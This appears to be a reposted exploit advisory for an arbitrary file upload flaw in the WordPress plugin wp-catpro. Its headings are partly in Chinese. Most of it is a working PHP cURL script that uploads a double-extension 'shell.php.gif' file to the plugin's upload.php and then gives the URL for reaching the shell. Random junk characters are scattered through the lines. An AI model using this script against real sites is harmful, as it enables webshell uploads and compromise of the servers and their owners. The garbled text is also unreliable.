Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability2 u1 F; j/ m$ f0 c7 V/ v p, x" K( N
#-----------------------------------------------------------------------4 \: z8 w: M) Q- e
' G; ~. c, J% q: Q7 r! l$ F( b2 e! B, ` ^
作者 => Zikou-16
h1 M- t; E8 _- \+ P邮箱 => zikou16x@gmail.com
' f, d: }: X& y2 X7 I7 ]测试系统 : Windows 7 , Backtrack 5r3
: g5 h* j$ T) h' O7 F+ J下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
/ h- ^% `! ]8 V/ \####
' j1 U* Y$ i1 O* a5 Z# X! W % v6 E' c# p, T' D$ ^% y5 K
#=> Exploit 信息:3 l) R7 q. N( S7 D! s
------------------
6 g8 u. y( r' m$ O* J# 攻击者可以上传 file/shell.php.gif
& X: n( y: N' v2 u. ^9 ~8 o" l$ Q# ("jpg", "gif", "png") // Allowed file extensions1 k3 [6 }$ [( p+ T- }) D! g, Z L) [
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)/ K# L4 s& D6 v9 h- E9 `
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)* W7 f. I/ i# z, \* b
------------------
. h7 n* x R- x
3 [4 X( r' Z& q( z! e- z3 Y#=> Exploit
0 e" q8 _& f4 E: i1 r-----------
\- |' S' |6 c# G6 V" K<?php
, ~) T+ H4 Y2 {% w, r
( l1 u* |7 C4 W* m$uploadfile="zik.php.gif";% z6 j w$ y+ K) z( j8 g
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");3 M7 J7 m3 m: V! `2 N
curl_setopt($ch, CURLOPT_POST, true);
5 E7 V9 d% V. \0 {) Ecurl_setopt($ch, CURLOPT_POSTFIELDS,6 n2 v- K1 b9 X& C" g
array('Filedata'=>"@$uploadfile",
1 I @* t1 g; q6 K! S& O'folder'=>'/wp-content/uploads/catpro/'));0 K) U( C8 ~# p' l
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);! Q. W: d1 z+ D
$postResult = curl_exec($ch);6 Z0 s8 a- R) u* n. e8 d7 Q9 e
curl_close($ch);2 D" `, O- U7 V) z2 I7 R1 P
( `4 Q2 T) I! V1 Z; `, T; Tprint "$postResult";
; m5 x5 K: `9 ~3 l
/ i# p; F0 o" |; oShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
2 V+ a( ^5 V- w; G1 P ?>
U1 ?' F- w4 W) `1 y7 U<?php
3 V; L" Y9 R" T/ U' {phpinfo();) a8 D; B: I3 k, C q: I$ L) h
?> |